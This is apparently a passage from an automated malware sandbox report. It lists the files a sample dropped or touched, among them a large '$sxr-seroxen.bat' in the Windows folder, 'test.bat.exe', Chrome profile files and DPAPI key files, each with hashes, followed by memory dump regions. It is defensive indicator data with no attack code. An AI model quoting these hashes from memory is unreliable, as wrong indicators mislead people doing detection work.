5736297c48ece5bf54e6c469d8ed70b26c22ae82e3cedd9dfda7234d83a87c8b

SHA512
253a9a735f16f8483478bffbb1d031c24edadf77aa4bc298bebaa7e5119968e3a8737c43b8977b28068a75d0cabfda420be0e32b9bc858d74f554b188e49932a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ea894621d4ccceebae98e004e5d14816

SHA1
929ffe7aa3b4ba178bcf940d26f36738a9f652d9

SHA256
8634578b95358b4da2775f3bb45872dc68eeed8b04890bdee95b27e356e18589

SHA512
9f5e957ea5a0ab744cf7fe9692040d222203bd51e79056a1e7f77fafd7181228c7f8744772d0a66adf62579dc4714f5d91d9e3ffec37d2773034606044b1cefd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
30fa54acf435be7ad2a0e6fb500460eb

SHA1
629350e936d63419ad6e352ffd51af41cf9a4127

SHA256
feac5022ea5f3ae94a45648e796bd602f2e17c10706859d135534a80f5b73108

SHA512
73482291777054b3a1d52f51c98a0c6ba7a523636d885bb0c02e87460934ec351485acf7c0337933c3977bcfa8f39516c5025d4286ca13fc6f3260bb9dd9ea8b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\e824465b-921f-4a30-970c-91dbf17d3058.tmp

Filesize
9KB

MD5
6dbf77bdb36f8c578944245a9336368f

SHA1
113b053330f7176de541d68572834a67ff41ee64

SHA256
e0498f6aea1970df8c0c80f77dfafca0e9104adf09e989b42af68a5195bc0bbb

SHA512
d1b0be4d5119219bd7d6c6d894405074e4b25566e1b795592c68707f3456462198ea28b37a9161b9f06ec87712b15aba99fc0721f90a1be5cd56f460981cc15c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
235KB

MD5
2997235620b58b70dd660aae25b4fcf8

SHA1
cf14b2d9e8dfbefc0729aff725efd3220da08fb0

SHA256
cc010920bcda9d90ab1d8ec6ea1eb5e9bae6373aa08cdd16218b1098f5fc6082

SHA512
050d96d4235fcb9ac0979fe2dc7eea8847819507fbf9667bef3d70b529ffdf6acc5f5756afb7f6a877eb917a64e617e6e98b6d28516389cff94cf24332d5aea8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
235KB

MD5
4fb4f7db491807bc83f4cad92754bd27

SHA1
bd7388afcac483e9eefa58e6761ea173aadd1775

SHA256
4fc314f6eba8ebf7de01da700751e1211fb109e45d6f159aca75e6d02af56f4e

SHA512
a6d39782302975c05b4b84cdccc752b028f06f30f6905821bcf3ebe1a5e3e45213f4833dc76752ef807b22dcc9e412c17b06e8e9c699082f9e9c8db5b8aadb23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
71f5efa1b29787914ccfcf1d653837e4

SHA1
385a0892525346c56c5952b04321241fa4446492

SHA256
d17376a2ad4b5d77eb2aa8e8a95d3a3d281b7be9e07874bc9588f290c42544c9

SHA512
ab1c864d79f7ce9aa05ba66e482341f71a32da90456778d328c57728164ca2799d6fd50ce3c659e51fb69e5c3f835784bf53166b819ea7b97f6406af0306689c

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\637bf50d-b4e6-485a-8057-4f72c56a98ab.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
340B

MD5
247dd5833383044117b522b5e9c97927

SHA1
3f8bdcde8ce6b1721a15ef119bf32f1155a6fedf

SHA256
ceb13c60dfba8e3bf7db0e10c8d58086c7466f44920e80f59d6e7492583896ad

SHA512
ce0ec38d1bbd725cb10108369c01cacc226ac7eda7825c04c7cccaf66070678ec35bab18d50b94e26eaa742fe06cc6803955d835f2547fb5ce516ffc52e48b45

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
290B

MD5
886af83f734c6402b4387dead1c7f526

SHA1
efbbbbf4912b8e9354e7a23799cdb8c998dbbaeb

SHA256
36fe5575b3cc923a9833e7adf3a35d0a6087e3d9bcd052416f864d711e8e87d8

SHA512
ce02c860197b3f8a1dd5488bc25fce0655a353fd317ffd5a7de6dce0b4ba3b6ad7cb772bdfbf282160d223ed28eb191f86339d7ca178b753f88de2513a9eb6ed

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
447b9b758f831cf41c1b180b76c11cc0

SHA1
ca235ab882970cf44d0a60c428c82cd72e2bd927

SHA256
d68e95483969349924c6d2b65f1e1aded4fbcb669676bde4f639c17578281399

SHA512
f0756be21d2b143698b5e2f79958c2ef36e863323848608d4223ec10e46b7eb67040b5bc4f7a6951cf0454d3a0adcc1a0b378632fbd5e3fd3799d804422f50ed

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

Filesize
400B

MD5
16e4b632f7815726c8f63112cdc92ece

SHA1
0c2a975b050e70848ae1b691e3988472209fff13

SHA256
32d7cdc75894b72fdb3c988cd3d2b14008ddc375733b2cbb1c0dd6d4176895db

SHA512
7d1e823a76630f4873c9f9758ef2f9ebb27de6888d9d50f4ba79ae818725b7b0e118899c0d701cd43322e198d955fa8e510df9f89c8daa295541111c2cecf609

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_frro1kpi.z02.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.bat.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1537126222-899333903-2037027349-1000\Preferred

Filesize
24B

MD5
4b53786208df931f09ec3c06cefbb29d

SHA1
0b22ca8b2c94085d1d23bd81f68a95f91747d673

SHA256
22285e85ddf2543a8443d7349be0ed16da4620a2f08417e89a6f682000f718a5

SHA512
6172e33fb6c751f50e651e2454bd4247b37bb39d3d570c05aa16c770be263e37671d3cd4dbaa12bd188138b315017df26c6affdf644f61561c2a8d387e36b510

Download Submit
C:\Windows\$sxr-seroxen.bat

Filesize
7.7MB

MD5
22070488e8b05fa3d1555e35cb02e2c4

SHA1
17affd9bceb5b254a65f2b918008118b3e771f5d

SHA256
f9265a0554ffd7971bacbd4335ab32109aa2f8ba7f70dba315f4e1f48674b990

SHA512
2db6d0ea121b100e0a2d69d93062f794ef52332139f67355a808cdf4310265575b17e62e3a6b2fe306a4ed8879a781bd203fc18cda7c074e0ded57c79528f0e6

Download Submit
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Filesize
24B

MD5
466fd25d686185c7d950f4c754fd2abf

SHA1
d4aeb5a6e598b7673e47e2937ab2837296698e8a

SHA256
69275a06ba890672282cc6c5376bcef618dd7f3fa5486915816de5bce1c599c9

SHA512
5feecc925e8961d04c19e982e9295e7b8f3171d24557ebd4d678cd1e2c636bff2526b63f5807dfff25220de47089a2aff9d2a892d1b0965c84247f6239113843

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

Filesize
412B

MD5
6ed369b9ec670d5a7305b6a20e6696e6

SHA1
bcd7d1e3bc7f4d7fa74d78eb3a0dbe5b19dc20c0

SHA256
efebf118fb6408b8a958b0425dc1e094cffdbddc911b6e29f4d2755a248c352f

SHA512
f62fca741a98dc36b0afd927e80d19c0b8b7383edbc4577c259a2e51845c7c48c528ac81832c799520823d9a9688e1bf85b820f06f619f2798f6a3f6a4b38bb8

Download Submit
memory/336-14-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-19-0x000001EED4310000-0x000001EED4CD8000-memory.dmp

Filesize
9.8MB

Download
memory/336-4-0x00007FFDE5B73000-0x00007FFDE5B75000-memory.dmp

Filesize
8KB

Download
memory/336-30-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-31-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-52-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-21-0x00007FFE069C0000-0x00007FFE06BC9000-memory.dmp

Filesize
2.0MB

Download
memory/336-13-0x000001EECB9A0000-0x000001EECB9C2000-memory.dmp

Filesize
136KB

Download
memory/336-22-0x00007FFE05CD0000-0x00007FFE05D8D000-memory.dmp

Filesize
756KB

Download
memory/336-20-0x000001EED4CE0000-0x000001EED4E06000-memory.dmp

Filesize
1.1MB

Download
memory/336-15-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-16-0x00007FFDE5B70000-0x00007FFDE6632000-memory.dmp

Filesize
10.8MB

Download
memory/336-17-0x000001EECBC70000-0x000001EECC240000-memory.dmp

Filesize
5.8MB

Download
memory/484-75-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/484-73-0x000001BF91790000-0x000001BF91934000-memory.dmp

Filesize
1.6MB

Download
memory/640-67-0x000002197AA40000-0x000002197ABE4000-memory.dmp

Filesize
1.6MB

Download
memory/640-66-0x000002197A910000-0x000002197AA3F000-memory.dmp

Filesize
1.2MB

Download
memory/640-68-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/700-77-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/700-74-0x000002B177E00000-0x000002B177FA4000-memory.dmp

Filesize
1.6MB

Download
memory/880-90-0x000002570EC70000-0x000002570EE14000-memory.dmp

Filesize
1.6MB

Download
memory/880-91-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1008-82-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1008-81-0x0000024F17140000-0x0000024F172E4000-memory.dmp

Filesize
1.6MB

Download
memory/1064-94-0x000001E0D4330000-0x000001E0D44D4000-memory.dmp

Filesize
1.6MB

Download
memory/1064-95-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1144-104-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1144-103-0x000001A45A070000-0x000001A45A214000-memory.dmp

Filesize
1.6MB

Download
memory/1168-107-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1168-106-0x0000020E20140000-0x0000020E202E4000-memory.dmp

Filesize
1.6MB

Download
memory/1208-109-0x0000018028000000-0x00000180281A4000-memory.dmp

Filesize
1.6MB

Download
memory/1208-110-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1216-113-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1216-112-0x000001EB5C140000-0x000001EB5C2E4000-memory.dmp

Filesize
1.6MB

Download
memory/1288-116-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1288-115-0x000001EF4A740000-0x000001EF4A8E4000-memory.dmp

Filesize
1.6MB

Download
memory/1308-119-0x00007FFDC6A50000-0x00007FFDC6A60000-memory.dmp

Filesize
64KB

Download
memory/1308-118-0x0000016217130000-0x00000162172D4000-memory.dmp

Filesize
1.6MB

Download
memory/1720-60-0x0000000140000000-0x00000001402F7000-memory.dmp

Filesize
3.0MB

Download
memory/1720-63-0x00007FFE05CD0000-0x00007FFE05D8D000-memory.dmp

Filesize
756KB

Download
memory/1720-61-0x0000000140000000-0x00000001402F7000-memory.dmp

Filesize
3.0MB

Download
memory/1720-62-0x00007FFE069C0000-0x00007FFE06BC9000-memory.dmp

Filesize
2.0MB

Download
memory/1720-64-0x0000000140000000-0x00000001402F7000-memory.dmp

Filesize
3.0MB

Download
memory/1720-65-0x0000000140000000-0x00000001402F7000-memory.dmp

Filesize
3.0MB

Download
memory/3140-55-0x000002185D660000-0x000002185D712000-memory.dmp

Filesize
712KB

Download
memory/3140-53-0x000002183B100000-0x000002183B158000-memory.dmp

Filesize
352KB

Download
memory/3140-58-0x00007FFE069C0000-0x00007FFE06BC9000-memory.dmp

Filesize
2.0MB

Download
memory/3140-59-0x00007FFE05CD0000-0x00007FFE05D8D000-memory.dmp

Filesize
756KB

Download
memory/3140-56-0x000002185D8F0000-0x000002185DAB2000-memory.dmp

Filesize
1.8MB

Download
memory/3140-335-0x000002185EAF0000-0x000002185F018000-memory.dmp

Filesize
5.2MB

Download
memory/3140-54-0x000002185D250000-0x000002185D2A0000-memory.dmp

Filesize
320KB

Download
memory/3140-57-0x000002185D720000-0x000002185D832000-memory.dmp

Filesize
1.1MB

Download
memory/3140-48-0x00007FFE069C0000-0x00007FFE06BC9000-memory.dmp

Filesize
2.0MB

Download
memory/3140-49-0x00007FFE05CD0000-0x00007FFE05D8D000-memory.dmp

Filesize
756KB

Download
memory/3388-51-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3596-33-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3596-32-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3596-23-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3596-26-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download
memory/3596-27-0x0000000140000000-0x000000014018B000-memory.dmp

Filesize
1.5MB

Download